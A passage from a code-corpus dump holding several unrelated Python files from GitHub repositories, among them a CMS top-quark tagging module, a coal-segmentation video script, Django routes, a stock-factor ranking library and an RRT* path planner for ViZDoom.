lenVar = \"Stop0l_nHOT\", limitedPrecision=True)\n self.out.branch(\"Stop0l_HOTtype\", \"I\", lenVar = \"Stop0l_nHOT\")\n\n def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n pass\n\n def SelDeepAK8(self, fatj):\n if fatj.deepTag_TvsQCD > self.DeepAK8TopWP and fatj.msoftdrop > self.minAK8TopMass:\n return 1\n elif fatj.deepTag_WvsQCD > self.DeepAK8WWP and fatj.msoftdrop > self.minAK8WMass:\n return 2\n else:\n return 0\n\n def SelDeepResolved(self, res, jets):\n if math.fabs(res.eta) > 2.0:\n return False\n if res.discriminator < self.DeepResolveWP:\n return False\n ## Veto resolved with two b-tagged jets\n if (jets[res.j1Idx].btagStop0l + jets[res.j2Idx].btagStop0l+ jets[res.j3Idx].btagStop0l) >= 2 :\n return False\n return True\n\n def ResovleOverlapDeepAK8(self, res, fatj, jets, subjets):\n ## Counting number 
of tops\n        if sum(self.FatJet_Stop0l ) == 0 or sum(self.ResolvedTop_Stop0l) == 0:\n            return False\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Getting jets ~~~~~\n        ### Subjet method\n        subjetides = []\n        for i, j in enumerate(fatj):\n            if self.FatJet_Stop0l[i] > 0 :\n                subjetides.append(j.subJetIdx1)\n                subjetides.append(j.subJetIdx2)\n        ## Resolved AK4 jets\n        resjets = defaultdict(list)\n        for i, t in enumerate(res):\n            if self.ResolvedTop_Stop0l[i]:\n                resjets[t.j1Idx].append(i)\n                resjets[t.j2Idx].append(i)\n                resjets[t.j3Idx].append(i)\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Making correlation ~~~~~\n        combs = np.asarray([(x,y) for x in subjetides for y in resjets.keys() ])\n        subjet_eta = np.asarray([ subjets[x].eta for x in combs[:, 0] ])\n        subjet_phi = np.asarray([ subjets[x].phi for x in combs[:, 0] ])\n        jet_eta = np.asarray([ jets[x].eta for x in combs[:, 1] ])\n        jet_phi = np.asarray([ jets[x].phi for x in combs[:, 1] ])\n        ## Using ufunc for vector operation\n        deta = np.power(subjet_eta-jet_eta, 2)\n        dPhi = subjet_phi - jet_phi\n        np.subtract(dPhi, 2*math.pi, out = dPhi, where= (dPhi >=math.pi))\n        np.add(dPhi, 2*math.pi, out =dPhi , where=(dPhi < -1*math.pi))\n        np.power(dPhi, 2, out=dPhi)\n        dR2 = np.add(deta, dPhi)\n        overlap = combs[np.where(dR2 < 0.04)]\n        if overlap.size == 0:\n            return False\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Killing overlap ~~~~~\n        ## Has overlap\n        for j in overlap[:, 1]:\n            for overlapidx in resjets[j]:\n                self.ResolvedTop_Stop0l[overlapidx] = False\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Clean up double counting in DeepResolved ~~~~~\n        for k, v in resjets.items():\n            ## counting tops per jets\n            if len(v) <= 1:\n                continue\n            ## Recount tops per jets\n            newtops = [ n for n in v if self.ResolvedTop_Stop0l[n] ]\n            if len(newtops) <= 1:\n                continue\n            ## Duplicate tops, keep the one with the highest discriminator\n            topbyscore = {}\n            for j in newtops:\n                topbyscore [ res[j].discriminator ] = j\n\n            for k in sorted(topbyscore.keys())[:-1]:\n                self.ResolvedTop_Stop0l[topbyscore[k]] = False\n        return True\n\n    def Clear(self):\n        self.FatJet_Stop0l = []\n        self.ResolvedTop_Stop0l = []\n\n    def GetISRJets(self, fatjets, subjets, met_phi):\n        if (self.nTop + self.nW + self.nResolved ) != 0:\n            return -1\n\n        if len(fatjets) == 0:\n            return -1\n\n        leadingjet = fatjets[0]\n        if leadingjet.pt < 200 or math.fabs(leadingjet.eta) > 2.4 or \\\n                leadingjet.btagDeepB > DeepCSVMediumWP[self.era]:\n            return -1\n\n        if subjets[leadingjet.subJetIdx1].btagDeepB > DeepCSVMediumWP[self.era] or \\\n           subjets[leadingjet.subJetIdx2].btagDeepB > DeepCSVMediumWP[self.era]:\n            return -1\n\n        # require the ISR candidate to be roughly back-to-back with MET\n        if math.fabs(ROOT.TVector2.Phi_mpi_pi( leadingjet.phi - met_phi )) < 2:\n            return -1\n\n        return 0\n\n    def CreateHOTs(self, fatjets, resolves ):\n        ptmap = defaultdict(list) ## in case two tops with same pt\n        for i, f in enumerate(fatjets):\n            if self.FatJet_Stop0l[i] >0:\n                ptmap[f.pt].append(i)\n\n        for i, r in enumerate(resolves):\n            if self.ResolvedTop_Stop0l[i]:\n                ptmap[r.pt].append(1000 + i)\n\n        HOTpt = []\n        HOTeta = []\n        HOTphi = []\n        HOTmass = []\n        HOTtype = []\n\n        for k in sorted(ptmap.keys(), reverse=True):\n            for idx in ptmap[k]:\n                obj = None\n                Type = 0\n                if idx >= 1000:\n                    obj = resolves[idx-1000]\n                    Type = 3\n                else:\n                    obj = fatjets[idx]\n                    Type = self.FatJet_Stop0l[idx]\n                HOTpt.append(obj.pt)\n                HOTeta.append(obj.eta)\n                HOTphi.append(obj.phi)\n                HOTmass.append(obj.mass)\n                HOTtype.append(Type)\n        return (HOTpt, HOTeta, HOTphi, HOTmass, HOTtype)\n\n    def analyze(self, event):\n        \"\"\"process event, return True (go to next 
module) or False (fail, go to next event)\"\"\"\n        ## Getting objects\n        jets = Collection(event, \"Jet\")\n        fatjets = Collection(event, \"FatJet\")\n        subjets = Collection(event, \"SubJet\")\n        resolves = Collection(event, \"ResolvedTopCandidate\")\n        met = Object(event, self.metBranchName)\n        self.Clear()\n\n        ## Selecting objects (wrap map() in list() so the results can be indexed and reused)\n        self.FatJet_Stop0l = list(map(self.SelDeepAK8, fatjets))\n        self.ResolvedTop_Stop0l = list(map(lambda x : self.SelDeepResolved(x, jets), resolves))\n        self.ResovleOverlapDeepAK8(resolves, fatjets, jets, subjets)\n        self.nTop = sum( [ i for i in self.FatJet_Stop0l if i == 1 ])\n        self.nW = sum( [ 1 for i in self.FatJet_Stop0l if i == 2 ])\n        self.nResolved = sum(self.ResolvedTop_Stop0l)\n        self.ISRJetidx = self.GetISRJets(fatjets, subjets, met.phi)\n        ISRJetPt = fatjets[self.ISRJetidx].pt if self.ISRJetidx != -1 else 0\n        (HOTpt, HOTeta, HOTphi, HOTmass, HOTtype) = self.CreateHOTs(fatjets, resolves)\n\n        ### Store output\n        self.out.fillBranch(\"FatJet_Stop0l\", self.FatJet_Stop0l)\n        self.out.fillBranch(\"ResolvedTop_Stop0l\", self.ResolvedTop_Stop0l)\n        self.out.fillBranch(\"Stop0l_nTop\", self.nTop)\n        self.out.fillBranch(\"Stop0l_nW\", self.nW)\n        self.out.fillBranch(\"Stop0l_nResolved\", self.nResolved)\n        self.out.fillBranch(\"Stop0l_ISRJetIdx\", self.ISRJetidx)\n        self.out.fillBranch(\"Stop0l_ISRJetPt\", ISRJetPt)\n        self.out.fillBranch(\"Stop0l_nHOT\", len(HOTpt))\n        self.out.fillBranch(\"Stop0l_HOTpt\", HOTpt)\n        self.out.fillBranch(\"Stop0l_HOTeta\", HOTeta)\n        self.out.fillBranch(\"Stop0l_HOTphi\", HOTphi)\n        self.out.fillBranch(\"Stop0l_HOTmass\", HOTmass)\n        self.out.fillBranch(\"Stop0l_HOTtype\", HOTtype)\n        return True\n\n# define modules using the syntax 'name = lambda : constructor' to avoid having them loaded when not needed\n","repo_name":"ahenckel/NanoSUSY-tools","sub_path":"python/modules/DeepTopProducer.py","file_name":"DeepTopProducer.py","file_ext":"py","file_size_in_byte":9131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"40383268470","text":"import cv2\n\nfrom constants import WEIGHTS_DIR, DATA_DIR\nfrom src.instance_segmentation.mask_rcnn import MaskRCNN\nfrom src.instance_segmentation.edge_segmentation import EdgeSegmentation\nfrom src.utils import plot_coals_contours_on_img, visualize_semantic_segmentation\n\n\ndef video_creator(model,\n                  video_path,\n                  visualize_method=plot_coals_contours_on_img,\n                  cut_params=(400, 568, 512, 1320),\n                  save_file_name='1_video.mp4',\n                  frames_range_to_save=None):\n    \"\"\"\n    Args:\n        frames_range_to_save: for example - (300, 750) .\n    \"\"\"\n    cap = cv2.VideoCapture(str(video_path))\n    frame_counter = 0\n\n    if frames_range_to_save:\n        left_cut_by_frame, right_cut_by_frame = frames_range_to_save\n        cap.set(cv2.CAP_PROP_POS_FRAMES, left_cut_by_frame)\n\n    # characteristics from the original video\n    # w_frame, h_frame = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n    fps, frames = cap.get(cv2.CAP_PROP_FPS), cap.get(cv2.CAP_PROP_FRAME_COUNT)\n\n    # suppose my gtx 1070 takes ~ 0.22 sec to run mask_rcnn inference on 1 frame, so my fps ~ 4,\n    # and from best_model3.pth (efficient_net-b3? 
or Unet) it takes ~ 0.15 sec so my fps would be ~ 6\n    my_realtime_fps = 6\n    x, y, h, w = cut_params\n\n    # output\n    fourcc = cv2.VideoWriter_fourcc(*'XVID')\n    out = cv2.VideoWriter(str(DATA_DIR / f'{save_file_name}'), fourcc, my_realtime_fps, (w, h))\n\n    while cap.isOpened():\n        ret, frame = cap.read()\n        frame_counter += 1\n\n        # Avoid problems when the video finishes\n        if ret:\n            # Saving from the desired frames\n            if frames_range_to_save:\n                if frame_counter <= (right_cut_by_frame - left_cut_by_frame):\n                    crop_frame = frame[y:y+h, x:x+w]\n                    coals = model.predict(crop_frame)\n                    img_with_contours = visualize_method(crop_frame, coals)\n                    out.write(img_with_contours)\n            else:\n                crop_frame = frame[y:y + h, x:x + w]\n                coals = model.predict(crop_frame)\n                img_with_contours = visualize_method(crop_frame, coals)\n                out.write(img_with_contours)\n        else:\n            break\n\n    cap.release()\n    out.release()\n    cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n    model_mask_rcnn = MaskRCNN(\n        weights=WEIGHTS_DIR / 'mask_rcnn.pth',\n        box_conf_th=0.7,\n        nms_th=0.2,\n        segmentation_th=0.7,\n        device='cuda:0'\n    )\n\n    model_semantic_effi_b0 = EdgeSegmentation(\n        weights=WEIGHTS_DIR / 'best_model3.pth',\n        segm_th_mask=0.8)\n\n    test_videos_params = {\n        # x, y, h, w\n        '1_video.mp4': {'cut_params': (400, 568, 512, 1344),\n                        'video_path': str(DATA_DIR / '20210712_141048_5E30.mkv'),\n                        'frames_range': None},\n        '2_video.mp4': {'cut_params': (500, 568, 512, 1344),\n                        'video_path': str(DATA_DIR / '20210712_142102_6239.mkv'),\n                        'frames_range': (300, 755)},\n    }\n\n    for video_name, video_params in test_videos_params.items():\n        video_creator(model_semantic_effi_b0,\n                      video_params['video_path'],\n                      visualize_method=visualize_semantic_segmentation,\n                      cut_params=video_params['cut_params'],\n                      save_file_name=video_name,\n                      frames_range_to_save=video_params['frames_range'])\n","repo_name":"comptech-winter-school/coal-composition-control","sub_path":"video_creater.py","file_name":"video_creater.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"29608632041","text":"from . 
import views\nfrom django.urls import path\n\nurlpatterns = [\n path('get_round/', views.get_round.as_view({'get': 'retrieve'})),\n path('end_game/', views.end_game.as_view({'post': 'partial_update'})),\n path('new_game/', views.new_game.as_view({'post': 'create_game'})),\n path('next_turn/', views.get_round.as_view({'post': 'partial_update'})),\n path('get_messages/', views.get_messages.as_view({'get': 'list'})),\n path('send_message/', views.new_message.as_view({'post': 'create_message'})),\n path('check_messages/', views.check_messages.as_view({'get': 'list'})),\n path('add_category//', views.category.as_view({'post': 'add_category'})),\n path('remove_category//', views.category.as_view({'post': 'remove_category'})),\n path('get_categories//', views.category.as_view({'get': 'list'})),\n path('update_channels/', views.channel.as_view({'post': 'update_channels'})),\n path('remove_channels/', views.channel.as_view({'post': 'remove_channels'})),\n path('get_channels/', views.channel.as_view({'get': 'list'})),\n path('new_user/', views.new_user.as_view({'post': 'create_user'})),\n]\n","repo_name":"fheeger/dispatch_bot_backend","sub_path":"dispatch_backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30473493938","text":"from django import template\nfrom django.contrib.auth.decorators import login_required\n\nfrom catalogue.models import ProductType\nfrom company.models import Company, Location\n\nregister = template.Library()\n\n\n@login_required\n@register.simple_tag\ndef my_locations(user):\n company = Company.objects.filter(user=user).first()\n mylocations = Location.objects.filter(company=company)\n return mylocations\n\n\n@login_required\n@register.simple_tag\ndef type_name():\n types = ProductType.objects.all()\n return types\n\n\n","repo_name":"fadaoddini/rebo_python","sub_path":"company/templatetags/mylocation_tag.py","file_name":"mylocation_tag.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73220339664","text":"from typing import Optional, Tuple\nfrom urllib.parse import urlparse\n\n\ndef uri_split(uri: str) -> Tuple[str, str, str]:\n \"\"\"\n Splits uri into protocol, root, and group\n\n Example:\n uri_split('file:///path/to/my_dataset.zarr#group/subgroup/etc')\n returns ('file', '/path/to/my_dataset.zarr', 'group/subgroup/etc')\n\n If the URI contains no '#' extension, the root group \"\" is returned.\n\n :param str uri: The URI to be parsed\n :return: (protocol, root, group)\n \"\"\"\n components = urlparse(uri)\n scheme = components.scheme\n path = components.netloc + components.path\n if not scheme:\n raise ValueError(f'uri scheme not found: {uri}')\n group = components.fragment\n return scheme, path, group\n\n\ndef uri_join(protocol: str, root: str, group: Optional[str] = None) -> str:\n \"\"\"Compose zarr uri from components: ://[#].\n\n :param protocol: storage protocol ('file' or 's3')\n :param root: location of zarr dataset root\n :param group: name of zarr group\n :return: zarr URI '://[#]'\n \"\"\"\n uri = f\"{protocol}://{root}\" + (f\"#{group}\" if group else \"\")\n return uri\n","repo_name":"opendatacube/datacube-zarr","sub_path":"datacube_zarr/utils/uris.py","file_name":"uris.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} 
+{"seq_id":"4720262458","text":"import requests\nimport os\nimport json\nfrom .init import get_config\nfrom .hasEntitlements import checkForEntitlements\nfrom .makeRequests import makePutRequest\n\n\ndef createProduct(\n bank_id=None,\n product_code=None,\n name=None,\n parent_product_code=\" \",\n category=None,\n family=None,\n superfamily=None,\n more_info_url=None,\n details=None,\n description=None,\n license_id=None,\n license_name=None\n ):\n\n payload = {\"bank_id\": bank_id,\n \"name\": name,\n \"parent_product_code\": parent_product_code,\n \"category\": category,\n \"family\": family,\n \"super_family\": superfamily,\n \"more_info_url\": more_info_url,\n \"details\": details,\n \"description\": description, \"meta\": {\"license\": {\"id\": license_id, \"name\": license_name}}}\n\n url = get_config('OBP_API_HOST') \\\n + '/obp/v4.0.0/banks/{BANK_ID}/products/{PRODUCT_CODE}'.format(BANK_ID=bank_id,PRODUCT_CODE=product_code)\n\n print(url)\n\n return makePutRequest(url, payload)\n","repo_name":"OpenBankProject/OBP-CLI","sub_path":"obp_python/createProduct.py","file_name":"createProduct.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"17101810601","text":"import gc as _gc\nimport numpy as _np\nimport os as _os\nimport pandas as _pd\nimport time as _time\n\nfrom ..operations.Format import factor as _factor\nfrom ..operations.Open import open_file as _open_file\nfrom ..operations.Path import path as _path\nfrom ..operations.Path import datapath\n\n\ndef factor_percentile(Factor, stock, prt_time=False):\n \"\"\"Get the percentile ranking of a factor of a stock.\n\n Opens all files containing param Factor in database,\n rank the Factor of given stock, save the data in a cache csv file.\n\n Args:\n Factor: str - One factor in database.\n stock: str - A ticket names.\n\n Returns:\n A list of floats with length = years contained in database\n and value of the ranked percentage.\n\n Raises:\n TypeError: assess type of param Factor and stock.\n \"\"\"\n s = _time.time()\n _instance_check(Factor, str) # raise TypeError\n _instance_check(stock, str)\n\n df = _get_df(Factor)\n\n result = df.rank().loc[stock] / len(df)\n result = [round(i, 5) for i in result.tolist()]\n\n e = _time.time()\n if prt_time is True:\n print(\"Time taken for with <{} companies> is {}s\".format(len(df), round((e-s)/5, 4)))\n _gc.collect()\n return result\n\n\ndef percentile(Factor, percentage=80):\n \"\"\"Get the upper percentile companies.\n\n Opens all files containing param Factor in database,\n rank the Factor of given stock, save the data in a cache csv file.\n\n Args:\n Factor: str - One factor in database.\n percentage: int - upper percentile companies of a factor.\n\n Returns:\n a numpy 2D array (shape=(4, 1)) of tickets that are above percentage in all companies of the factor\n\n Raises:\n TypeError: assess type of param Factor and percentage\n ValueError: assess if param percentage within [0, 100]\n \"\"\"\n\n _instance_check(Factor, str) # TypeError\n _instance_check(percentage, int)\n _value_check(percentage) # ValueError\n\n df = _get_df(Factor) # get DataFrame from setup path\n\n target = df[df >= df.quantile(percentage / 100.0)].dropna(thresh=1) # select percentile group\n result = [_np.array(target[i].dropna().index.tolist()) for i in list(df)] # get satisfied tickets\n\n _gc.collect()\n return _np.array(result)\n\n\ndef best(Factor):\n \"\"\"Get the BEST performing company of a factor.\n\n 
\n\ndef percentile(Factor, percentage=80):\n    \"\"\"Get the upper percentile companies.\n\n    Opens all files containing param Factor in the database,\n    ranks all companies on the Factor, and saves the data in a cache csv file.\n\n    Args:\n        Factor: str - One factor in database.\n        percentage: int - percentile cutoff; companies at or above it are selected.\n\n    Returns:\n        a numpy 2D array (one row per yearly column) of tickets that are at or above the given percentile of the factor\n\n    Raises:\n        TypeError: raised if param Factor is not a str or percentage is not an int\n        ValueError: raised if param percentage is outside [0, 100]\n    \"\"\"\n\n    _instance_check(Factor, str) # TypeError\n    _instance_check(percentage, int)\n    _value_check(percentage) # ValueError\n\n    df = _get_df(Factor) # get DataFrame from setup path\n\n    target = df[df >= df.quantile(percentage / 100.0)].dropna(thresh=1) # select percentile group\n    result = [_np.array(target[i].dropna().index.tolist()) for i in list(df)] # get satisfied tickets\n\n    _gc.collect()\n    return _np.array(result)\n\n\ndef best(Factor):\n    \"\"\"Get the BEST performing company of a factor.\n\n    Args:\n        Factor: str - One factor in database.\n\n    Returns:\n        a numpy array (one entry per yearly column) naming the BEST performing company.\n\n    Raises:\n        TypeError: raised if param Factor is not a str.\n    \"\"\"\n    _instance_check(Factor, str) # raise TypeError\n\n    df = _get_df(Factor)\n    _gc.collect()\n    return _np.array(df.idxmax(), dtype=str) # ticket with the max value in each column\n\n\ndef worst(Factor):\n    \"\"\"Get the WORST performing company of a factor.\n\n    Args:\n        Factor: str - One factor in database.\n\n    Returns:\n        a numpy array (one entry per yearly column) naming the WORST performing company\n\n    Raises:\n        TypeError: raised if param Factor is not a str.\n    \"\"\"\n    _instance_check(Factor, str) # raise TypeError\n\n    df = _get_df(Factor)\n    _gc.collect()\n    return _np.array(df.idxmin(), dtype=str)\n\n\ndef _get_df(Factor):\n    \"\"\"Opens the factor data cache csv file\n\n    Opens the factor data csv, asks _is_updated() whether new stocks exist in the database,\n    and triggers a cache update if needed.\n\n    Args:\n        Factor: str - One factor in database.\n\n    Returns:\n        a pandas DataFrame with ticket names (rows) vs ['0', '1', '2', '3'] (column names).\n    \"\"\"\n    # NOT THE SAME as jaqk.open_file or jaqk.open_general\n    try:\n        # using cache\n        df = _pd.read_csv(_os.path.join(_datapath(), 'general', '_'.join(Factor.split(' ')) + '.csv'), index_col=0)\n        b, diff = _is_updated(df) # check update, b -> boolean\n        if b is False:\n            pass\n        else:\n            df_new = _percentile_core(Factor, diff, update=b)\n            df = _update_old_one(df_new, df, Factor) # perform update on cache csv file\n    except FileNotFoundError:\n        df = _percentile_core(Factor) # the factor has no cache in the database yet\n    return df
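\n\n# Cache-flow note: _get_df() serves a factor table from the csv cache under 'general/' when one exists;\n# _is_updated() diffs the cached index against the data directory, so only newly added tickets are recomputed.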
\n\ndef _percentile_core(Factor, diff=None, update=False):\n    \"\"\"Gets factor data when the factor cache doesn't exist\n\n    Iterates through the company list, opens the corresponding report to locate the factor,\n    and puts the factor data of each company in one row of the final pandas DataFrame.\n\n    Args:\n        Factor: str - One factor in database.\n        diff: set/list - tickets that need update, passed into _needs_update().\n        update: bool - whether this call updates an existing cache; if True, saving is left to _update_old_one().\n\n    Returns:\n        a pandas DataFrame with tickets (rows) vs ['0', '1', '2', '3'] (columns),\n        containing the value of param Factor for each company in the database.\n\n    Raises:\n        ValueError: raised if Factor is in neither the database nor the calculations.\n    \"\"\"\n    # NOT STABLE YET; EMPTY STACK OCCURS OCCASIONALLY\n\n    flag = False\n    # _factor_dic: all calculated factors that are not in the original csv sheets\n    _factor_dic = {'FCF': 'cash_flow', 'IC': 'balance', 'NIBCLS': 'balance', 'Invested_Book_Capital': 'balance'}\n\n    try:\n        name = _path(Factor)\n    except ValueError:\n        if Factor in _factor_dic.keys(): # calculated factors\n            flag = True\n            name = _factor_dic[Factor]\n        else:\n            msg = \"No support for factor '{}'\"\n            raise ValueError(msg.format(Factor))\n\n    d = _needs_update(diff) # tickets to iterate through\n    r = []\n    d2 = d[:]\n    for i in d2:\n        try:\n            if flag: # calculated factors\n                exec('from ..factors.{} import {} as {}'.format(name, Factor, Factor)) # import the calculation function by name\n                f = eval(Factor + '(i)')\n            else:\n                df = _open_file(i, name)\n                f = _factor(df, Factor)\n            if len(f) != 4 and name in ['income', 'balance', 'cash_flow']:\n                d.remove(i)\n                continue\n            else:\n                r.append(f)\n        except Exception as e: # drops the company with whatever problem\n            d.remove(i)\n            _write_error(i) # record the error in a txt file\n\n    if len(r) == 0:\n        return None\n\n    n = _np.stack(r)\n    assert len(n) == len(d)\n    df = _pd.DataFrame(n, index=d)\n    df.columns = [str(i) for i in list(df)]\n    if not update: # the cache did not exist yet\n        _save_csv(df, Factor)\n    del d, r, d2, n\n    _gc.collect()\n    return df\n\n\ndef _is_updated(df): # only for rankings\n    \"\"\"Check if there are any new tickets in the database.\n\n    Read the index (tickets) of df, compare it with database tickets.\n\n    Args:\n        df: pandas DataFrame of factor data cache in database.\n\n    Returns:\n        bool: whether there is an update or not.\n        diff: set - the new ticket names in the database.\n    \"\"\"\n    index = df.index.tolist()\n    try:\n        # Read error txt (baby version of log), record into a list\n        f = open(_os.path.join(_datapath(), 'general', 'error_cache.txt'))\n        er = f.read().split('\\n')\n        f.close()\n    except FileNotFoundError:\n        er = []\n    index = set(index + er) # original database\n    dirs = set(_os.listdir(_datapath())) # current database\n    diff = dirs.difference(index) # finding differences\n    if len(diff) == 0:\n        return False, {}\n    else:\n        return True, diff # returns a set\n\n\ndef _write_error(i):\n    \"\"\"Record the companies with errors so such tickets won't be retried again in the future\n\n    Reads existing errors into a set, then writes the set back with the new error ticket\n\n    Args:\n        i: str - the ticket being processed in the loop in _percentile_core()\n\n    Returns:\n        None\n    \"\"\"\n    path = _os.path.join(_datapath(), 'general', 'error_cache.txt')\n    try:\n        with open(path) as w:\n            f = set(w.readlines())\n    except FileNotFoundError:\n        f = set()\n    f.update({i}) # update as set([i])\n    with open(path, 'w+') as e:\n        e.write('\\n'.join(f))\n\n\ndef _needs_update(diff):\n    \"\"\"Get the tickets whose factor data needs to be added to the factor data cache.\n\n    Args:\n        diff: set - tickets that need update from _is_updated(), passed in through _percentile_core().\n\n    Returns:\n        list of ticket names that need to be updated\n    \"\"\"\n    if diff is None:\n        dirs = _os.listdir(_datapath()) # update everything\n        d = [i for i in dirs if _os.path.isdir(_os.path.join(_datapath(), i))] # eliminate non-directory files\n    else:\n        d = list(diff)\n    return d\n\n\ndef _update_old_one(df_new, df_old, Factor):\n    \"\"\"Update the existing factors data cache in database.\n\n    Call _save_csv() to save the new DataFrame.\n\n    Args:\n        df_new: new DataFrame generated in _percentile_core().\n        df_old: old DataFrame derived from database.\n        Factor: str - One factor in database.\n\n    Returns:\n        pandas DataFrame with all companies updated for param Factor\n    \"\"\"\n    # print('_update_old_one')\n    df = _pd.concat((df_old, df_new), sort=False)\n    _save_csv(df, Factor)\n    return df\n\n\ndef _save_csv(df, Factor):\n    \"\"\"Save DataFrame into csv file in database.\n\n    Args:\n        df: pandas DataFrame.\n        Factor: str - One factor in database.\n\n    Returns:\n        None\n    \"\"\"\n    df.to_csv(_os.path.join(_datapath(), 'general', '_'.join(Factor.split(' ')) + '.csv'))\n\n\ndef _datapath(setup=True):\n    \"\"\"\n    The global datapath for all other files. 
It sets your selected path in jaqk.setup() as the main datapath, and all data will be added/deleted from there.\n    \"\"\"\n    try:\n        p = _os.path.abspath(_os.path.join(_os.path.dirname(__file__), _os.pardir))\n        with open(_os.path.join(p, 'setup_cache.txt')) as w:\n            path = w.read()\n        if setup is True:\n            return path\n        else:\n            return _os.path.join(p, 'database')\n    except FileNotFoundError:\n        return _os.path.join(p, 'database')\n\n\ndef _instance_check(param, dtype):\n    msg = \"Parameter '{}' should be a {}, not a {}.\"\n    if not isinstance(param, dtype):\n        raise TypeError(msg.format(str(param), dtype.__name__, type(param).__name__))\n\n\ndef _value_check(p):\n    # print(\"_check_percentage\")\n    msg = \"Parameter 'percentage' should be in the interval [0, 100]. Try {} instead.\"\n    if 0 < p < 1:\n        m = 100 if p * 100 > 100 else p * 100\n        raise ValueError(msg.format(m))\n    elif p > 100:\n        m = 100 if p / 100 > 100 else round(p / 100, 2)\n        raise ValueError(msg.format(m))\n\n\ndef _CAGR(Factor, years): # compound annual growth rate, not developed\n    pass\n","repo_name":"Haannbboo/JAQK","sub_path":"build/lib/jaqk/calculations/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":10610,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"74552914704","text":"import os\n\nfrom time import sleep\nimport vizdoom as vzd\n\n\n\nimport sys, random, math, pygame\nfrom pygame.locals import *\nfrom math import sqrt, cos, sin, atan2\nimport cv2\nimport numpy as np\n\n# constants\nXDIM = 637\nYDIM = 480\nWINSIZE = [XDIM, YDIM]\nstepsize = 4.0\nNUMNODES = 60000\nRADIUS = 10\n\ndef dist(p1, p2):\n    return sqrt((p1[0] - p2[0]) * (p1[0] - p2[0]) + (p1[1] - p2[1]) * (p1[1] - p2[1]))\n\ndef step_from_to(p1, p2):\n    if dist(p1, p2) < stepsize:\n        return p2\n    else:\n        theta = atan2(p2[1] - p1[1], p2[0] - p1[0])\n        return p1[0] + stepsize * cos(theta), p1[1] + stepsize * sin(theta)\n\n\ndef chooseParent(nn, newnode, nodes):\n    for p in nodes:\n        if dist([p.x, p.y], [newnode.x, newnode.y]) < RADIUS and p.cost + dist([p.x, p.y],\n                                                                              [newnode.x, newnode.y]) < nn.cost + dist(\n                [nn.x, nn.y], [newnode.x, newnode.y]):\n            nn = p\n    newnode.cost = nn.cost + dist([nn.x, nn.y], [newnode.x, newnode.y])\n    newnode.parent = nn\n    return newnode, nn\n\n\ndef reWire(nodes, newnode, pygame, screen):\n    white = 255, 240, 200\n    black = 20, 20, 40\n    for i in range(len(nodes)):\n        p = nodes[i]\n        if p != newnode.parent and dist([p.x, p.y], [newnode.x, newnode.y]) < RADIUS and newnode.cost + dist([p.x, p.y],\n                                                                                                             [newnode.x,\n                                                                                                              newnode.y]) < p.cost:\n            pygame.draw.line(screen, white, [p.x, p.y], [p.parent.x, p.parent.y])\n            p.parent = newnode\n            p.cost = newnode.cost + dist([p.x, p.y], [newnode.x, newnode.y])\n            nodes[i] = p\n            pygame.draw.line(screen, black, [p.x, p.y], [newnode.x, newnode.y])\n    return nodes\n\n\ndef drawSolutionPath(start, goal, nodes, pygame, screen):\n    pink = 200, 20, 240\n    nn = nodes[0]\n    for p in nodes:\n        if dist([p.x, p.y], [goal.x, goal.y]) < dist([nn.x, nn.y], [goal.x, goal.y]):\n            nn = p\n    if dist([nn.x,nn.y],[goal.x,goal.y])>20:\n        print(\"path not found\")\n        return\n    while nn != start:\n        path.append((nn.x,nn.y))\n        pygame.draw.line(screen, pink, [nn.x, nn.y], [nn.parent.x, nn.parent.y], 5)\n        nn = nn.parent\n\ndef isInObstacle(vex, obstacles):\n    if vex.y < 0 or vex.y > 477:\n        return True\n    if vex.x < 0 or vex.x > 634:\n        return True\n    # for x,y in corners :\n    #     if sqrt((vex.x-x)**2 + (vex.y-y)**2)<=2:\n    #         return True\n    alpha = math.floor(vex.y)\n    beta = math.floor(vex.x)\n    if 
